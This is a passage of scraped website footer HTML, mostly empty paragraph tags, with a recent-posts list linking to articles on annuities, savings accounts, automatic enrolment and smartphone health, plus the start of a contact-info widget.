>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<section class=\"columns columns-3\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Our Latest Posts</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Contact Info</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"contact-info-container\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p